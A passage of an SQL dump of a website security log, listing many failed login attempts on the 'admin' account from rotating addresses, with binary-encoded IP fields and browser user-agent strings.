Firefox/62.0'),(4562,7703,1629258451.103175,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��M\\R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4563,7704,1629258633.612664,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4564,7705,1629258831.313506,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�^_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4565,7706,1629259054.018637,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4566,7706,1629259054.109674,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4567,7707,1629259230.119806,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4568,7708,1629259665.193234,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4569,7709,1629259857.820180,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���>	z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4570,7710,1629260062.680174,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4571,7711,1629260241.891895,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4572,7712,1629260466.493455,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4573,7713,1629260643.635509,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Ž�R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4574,7714,1629260874.354333,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4575,7715,1629261055.249086,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4576,7716,1629261455.036183,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��;n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4577,7717,1629261678.724964,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4578,7718,1629261881.634346,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���i','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4579,7719,1629262059.020319,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����s�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4580,7720,1629262282.612372,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��D�D�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4581,7721,1629262462.542764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����j�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4582,7722,1629262683.461848,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4583,7723,1629262901.939559,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4584,7724,1629263067.985553,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gI��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4585,7725,1629263291.762592,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4586,7726,1629263475.138583,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4587,7727,1629263679.097344,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4588,7728,1629263903.718850,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4589,7729,1629264081.327648,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���֣%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4590,7730,1629264282.415014,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���C�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4591,7731,1629264484.812420,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4592,7732,1629264683.103296,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\'B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4593,7733,1629264893.905703,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4594,7734,1629265111.798586,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4595,7735,1629265317.651082,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4596,7736,1629265494.242667,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4597,7737,1629265718.243061,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4598,7738,1629265899.529717,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4599,7739,1629266127.592935,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��m�\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4600,7740,1629266306.581585,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/k!\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4601,7741,1629266512.837744,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4602,7742,1629266747.563681,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4603,7743,1629266932.884094,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���h,q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4604,7744,1629267157.316601,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4605,7745,1629267328.552849,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���`J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4606,7746,1629267532.719472,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4607,7747,1629267764.718025,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4608,7748,1629268085.953690,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��[�o}','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4609,7749,1629268315.562268,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4610,7750,1629268512.110926,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4611,7751,1629268694.574112,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���&V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4612,7752,1629268900.386892,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4613,7753,1629269104.785309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4614,7754,1629269309.622276,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��gmш','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4615,7755,1629269510.485271,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ŜJ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4616,7756,1629269718.359719,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4617,7757,1629269948.694512,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��P��\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4618,7758,1629270150.504094,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4619,7759,1629270330.870982,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Tu�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4620,7760,1629270554.742823,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4621,7760,1629270554.752420,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4622,7761,1629270820.007998,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]q�v','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4623,7762,1629270967.732444,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4624,7763,1629271168.486460,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0g3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4625,7764,1629271387.704347,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4626,7765,1629271584.370374,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4627,7765,1629271584.406552,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4628,7767,1629271995.455718,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���O�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4629,7768,1629272209.449103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4630,7769,1629272420.335152,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4631,7770,1629272607.415997,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����V�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4632,7772,1629272903.388964,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�.�','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),(4633,7773,1629273018.118162,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��B�|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4634,7774,1629273241.637989,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4635,7775,1629273448.950689,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4636,7776,1629273656.575457,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e >�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4637,7777,1629273869.202653,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���n�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4638,7778,1629274090.886859,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4639,7779,1629274282.905412,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���b','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4640,7780,1629274522.700355,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4641,7781,1629274699.111425,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4642,7782,1629274908.252976,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4643,7783,1629275146.357865,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4644,7784,1629275357.332208,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VBe','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4645,7785,1629275539.174418,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\ru3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4646,7786,1629275779.342430,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4647,7787,1629275990.165024,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@�:�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4648,7788,1629276204.292581,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4649,7789,1629276425.815689,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����J','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4650,7790,1629276638.295780,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4651,7791,1629276845.723548,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��X�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4652,7792,1629277030.390547,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4653,7793,1629277262.704201,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4654,7794,1629278149.643728,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4655,7795,1629278490.190214,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4656,7796,1629278831.038439,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4657,7797,1629279217.124030,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4658,7798,1629279558.971236,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g1?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4659,7799,1629279921.364687,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��+�Hu','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4660,7800,1629280326.778567,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4661,7801,1629280648.596822,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4662,7802,1629281020.962645,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Gڿ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4663,7803,1629281414.108714,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4664,7804,1629281787.338020,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4665,7806,1629282504.984805,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4666,7806,1629282505.007810,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4667,7807,1629282874.780759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���py','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4668,7808,1629283598.168068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���6x]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4669,7808,1629283598.238381,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���6x]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4670,7809,1629284002.842753,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��4���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4671,7810,1629284376.445894,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��u,�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4672,7811,1629284732.112644,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4673,7812,1629285144.696317,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/k!\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4674,7813,1629285489.263520,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4675,7814,1629285842.187314,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4676,7815,1629286207.518446,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4677,7816,1629286591.854530,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4678,7818,1629287338.262084,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4679,7819,1629287720.415507,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4680,7819,1629287720.426325,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4681,7820,1629288066.103089,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4682,7821,1629288450.543627,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/4�*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4683,7822,1629288835.446706,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��}:w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4684,7823,1629289217.957918,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4685,7824,1629289638.621063,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4686,7825,1629289998.445582,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Tu�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4687,7826,1629290363.713057,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����zX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4688,7827,1629290760.202689,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3�T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4689,7828,1629291120.587134,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4690,7829,1629291494.119256,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4691,7830,1629291904.063155,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���X�!','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4692,7831,1629292294.478768,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4693,7832,1629292430.916083,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��?��','Mozilla/5.0 (Windows NT 6.3; 